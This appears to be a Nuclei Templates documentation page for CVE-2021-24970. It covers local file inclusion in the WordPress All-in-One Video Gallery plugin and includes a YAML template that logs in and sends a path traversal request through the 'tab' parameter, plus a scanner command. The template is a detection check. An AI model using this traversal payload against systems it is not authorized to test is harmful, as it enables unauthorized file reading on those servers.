Skip to content
Nuclei Templates

WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion

ID: CVE-2021-24970

Severity: high

Author: r3Y3r53

Tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360

Description

Section titled “Description”

WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24970


info:
  name: WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion
  author: r3Y3r53
  severity: high
  description: |
    WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: Fixed in version 2.5.4.
  reference:
    - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
    - https://wordpress.org/plugins/all-in-one-video-gallery
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24970
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24970
    cwe-id: CWE-22
    epss-score: 0.0297
    epss-percentile: 0.90861
    cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugins360
    product: all-in-one_video_gallery
    framework: wordpress
  tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "All-in-One Video Gallery")'
          - 'contains(body_2, "Hello world!")'
          - 'contains(body_2, "Welcome to WordPress")'
        condition: and
# digest: 4b0a0048304602210097f3e4789bf7d1992a864d5b14f653b882359283a970ebba3b345022ce39296e022100e927c56e81214ebf159a057970215d03822e8e8ca96eedabe149002669cca87a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24970.yaml"

View on Github